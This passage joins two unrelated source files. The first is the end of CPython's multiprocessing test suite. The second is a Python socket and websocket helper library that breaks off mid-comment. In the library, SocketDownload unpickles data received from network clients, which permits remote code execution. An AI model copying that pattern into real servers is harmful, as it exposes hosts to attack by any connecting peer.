except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
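# Tests for the start-method API: get_context(), get/set_start_method() and
# get_all_start_methods().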
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
    In the following unit tests the base type is created in the parent
    process, the @classmethod represents the worker process, and the
    shared object is readable and editable by both.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
    def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
__init__.py
|
import struct, socket, threading, json, os, pickle
from essentials import tokening
import essentials
import copy
import time
from hashlib import sha1
import base64
import six
PYTHONIC = "python based"
WEBONIC = "web based"
LEGACY = "legacy"
def SocketDownload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
payload_size = struct.calcsize(">L")
while len(data) < payload_size:
data += sock.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(data) < msg_size:
data += sock.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
if usage != None:
usage.add(len(frame_data))
try:
xData = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
return xData, data
except:
print("EOF Error Caught.")
except Exception as e:
raise ConnectionError("Connection Error:", e)
def SocketUpload(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
data = pickle.dumps(data, 0)
frame = struct.pack(">L", len(data)) + data
if usage != None:
usage.add(len(frame))
sock.sendall(frame)
except:
raise ConnectionError("Connection Error")
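# A minimal sketch (not part of the library) of the wire format used by
# SocketUpload/SocketDownload above: each message is a 4-byte big-endian
# length prefix followed by a pickle of the payload. The connected socket
# pair is assumed to exist already; this is illustrative only.
#
#     payload = pickle.dumps({"hello": "world"}, 0)
#     frame = struct.pack(">L", len(payload)) + payload  # length prefix + body
#     sock.sendall(frame)                                # what SocketUpload does
#     # SocketDownload reads the 4-byte prefix, unpacks the length, reads that
#     # many bytes, unpickles them, and returns (object, leftover_buffer).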
def Encode_WebSocket_Message(data="", mask=0):
if isinstance(data, six.text_type):
data = data.encode('utf-8')
length = len(data)
fin, rsv1, rsv2, rsv3, opcode = 1, 0, 0, 0, 0x1
frame_header = chr(fin << 7 | rsv1 << 6 | rsv2 << 5 | rsv3 << 4 | opcode)
if length < 0x7e:
frame_header += chr(mask << 7 | length)
frame_header = six.b(frame_header)
elif length < 1 << 16:
frame_header += chr(mask << 7 | 0x7e)
frame_header = six.b(frame_header)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(mask << 7 | 0x7f)
frame_header = six.b(frame_header)
frame_header += struct.pack("!Q", length)
return frame_header + data
def SocketUpload_WebBased(sock, data, usage=None):
"""
Helper function for Socket Classes
"""
try:
        if not isinstance(data, bytes):
            print("WARNING: Web sockets expect byte-like data. Make sure your data is encoded next time.")
data = data.encode()
frame = Encode_WebSocket_Message(data)
if usage != None:
usage.add(len(frame))
sock.send(frame)
except Exception as e:
raise ConnectionError("Connection Error: " + str(e))
def HostServer(HOST, PORT, connections=5, SO_REUSEADDR=True):
"""
Helper function for Socket Classes
"""
PORT = int(os.getenv('PORT', PORT))
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
if SO_REUSEADDR == True:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST,PORT))
sock.listen(connections)
return sock
def ConnectorSocket(HOST, PORT):
"""
Helper function for Socket Classes
"""
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect((HOST, PORT))
return clientsocket
def WebSocket_Decode_Message(data):
"""
Helper function for Socket Classes
"""
data = bytearray(data)
if(len(data) < 6):
raise Exception("Error reading data")
assert(0x1 == (0xFF & data[0]) >> 7)
assert(0x1 == (0xF & data[0]))
assert(0x1 == (0xFF & data[1]) >> 7)
datalen = (0x7F & data[1])
if(datalen > 0):
mask_key = data[2:6]
masked_data = data[6:(6+datalen)]
unmasked_data = [masked_data[i] ^ mask_key[i%4] for i in range(len(masked_data))]
resp_data = bytearray(unmasked_data).decode("utf-8")
else:
resp_data = ""
return resp_data
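# Rough shape of the masked client-to-server frames the decoder above expects
# (a simplification of RFC 6455; note the length byte handling only covers
# payloads of up to 125 bytes):
#
#     byte 0   : FIN flag + opcode (0x81 for a final text frame)
#     byte 1   : MASK flag + payload length
#     bytes 2-5: 4-byte masking key
#     bytes 6+ : payload, XOR'd with the masking key repeated every 4 bytes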
class Transfer_Record(object):
def __init__(self):
self.sent = Data_Storage()
self.received = Data_Storage()
class Data_Storage(object):
def __init__(self):
self.bytes = 0
self.commits = 0
def add(self, count, unit_type="b"):
if unit_type == "b":
self.bytes += count
elif unit_type == "mb":
self.bytes += (1048576 * count)
elif unit_type == "gb":
self.bytes += (1073741824 * count)
else:
raise ValueError("unit type not found for conversion")
self.commits += 1
@property
def megabytes(self):
return self.bytes * 0.000001
@property
def gigabyte(self):
return self.megabytes * 0.001
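# Illustrative usage of the accounting helpers above (not executed on import):
# each Transfer_Record keeps independent byte/commit counters per direction.
#
#     usage = Transfer_Record()
#     usage.sent.add(2048)                 # 2048 bytes, one commit
#     usage.sent.add(1, unit_type="mb")    # add a full megabyte
#     print(usage.sent.bytes, usage.sent.commits, usage.sent.megabytes)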
class Socket_Server_Host:
    def __init__(self, HOST, PORT, on_connection_open, on_data_recv, on_question, on_connection_close=False, daemon=True, autorun=True, connections=5, SO_REUSEADDR=True, heart_beats=True, heart_beat_wait=20, legacy_buffer_size=1024):
        """Host your own socket server to allow connections to this computer.
Parameters
----------
HOST (:obj:`str`): Your hosting IP Address for this server.
PORT (:obj:`int`): Which port you'd like to host this server on.
        on_connection_open (:obj:`def`): The function to call when you get a new connection. Receives the new Socket_Server_Client instance.
on_data_recv (:obj:`def`): The function to call when you receive data from a connection.
on_question (:obj:`def`): The function to call when you receive a question from a connection.
on_connection_close (:obj:`def`, optional): The function to call when a connection is closed.
daemon (:obj:`bool`, optional): If you'd like the server to close when the python file closes or is interrupted.
autorun (:obj:`bool`, optional): Will run the server on init.
connections (:obj:`int`, optional): How many connections to allow at one time. To be used with autorun = True
Attributes
----------
running (:obj:`bool`): Is the server still running.
connections (:obj:`dict`): Holds all connection threads.
        on_connection_open (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not affect existing connections.
        on_connection_close (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not affect existing connections.
        on_data_recv (:obj:`def`): Holds the function you specified to use; can be overwritten. NOTE: Overwriting this will not affect existing connections.
"""
self.on_connection_open = on_connection_open
self.on_connection_close = on_connection_close
self.on_data_recv = on_data_recv
self.HOST = HOST
self.PORT = PORT
self.heart_beats = heart_beats
self.heart_beat_wait = heart_beat_wait
self.connections = {}
self.on_question = on_question
self.running = False
self.legacy_buffer_size = legacy_buffer_size
if autorun:
self.Run(connections, daemon, SO_REUSEADDR)
def Run(self, connections=5, daemon=True, SO_REUSEADDR=True):
"""
        Start the server on the specified host, port, and listening count.
        This setup allows you to shut down, change, and restart the server.
Parameters
----------
connections (:obj:`int`): How many connections to accept at one time
:rtype: None
"""
self.server = HostServer(self.HOST, self.PORT, connections, SO_REUSEADDR)
self.running = True
self.broker = threading.Thread(target=self.ConnectionBroker, daemon=daemon)
self.broker.start()
def ConnectionBroker(self):
"""
        Server background task for accepting connections; you won't need to call this directly.
:rtype: None
"""
while self.running:
try:
conn, addr = self.server.accept()
if self.running == False:
conn.close()
return
conID = tokening.CreateToken(12, self.connections)
connector = Socket_Server_Client(conn, addr, conID, self.on_connection_open, self.on_data_recv, on_question=self.on_question, on_close=self.close_connection, Heart_Beat=self.heart_beats, Heart_Beat_Wait=self.heart_beat_wait, legacy_buffer_size=self.legacy_buffer_size)
self.connections[conID] = connector
time.sleep(0.05)
except Exception as e:
self.running = False
raise e
def close_connection(self, connection):
"""
        Server background task for clearing connections and notifying the parent file; you won't need to call this directly.
:rtype: None
"""
try:
self.on_connection_close(connection)
except:
pass
del self.connections[connection.conID]
def Shutdown(self):
"""
Shutdown the server and close all connections.
:rtype: None
"""
self.running = False
keys = list(self.connections.keys())
for con in keys:
try:
self.connections[con].shutdown()
except:
pass
self.connections = {}
try:
self.server.close()
except:
pass
def CloseConnection(self, conID):
"""
Shortcut to close a certain connection.
Can also be used as Server.connections[conID].shutdown()
:rtype: None
"""
self.connections[conID].shutdown()
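# A minimal hosting sketch (illustrative only; the callback names and port are
# assumptions, any callables with these signatures will do):
#
#     def on_open(client):                 # receives a Socket_Server_Client
#         client.send({"welcome": True})
#
#     def on_data(data, client):
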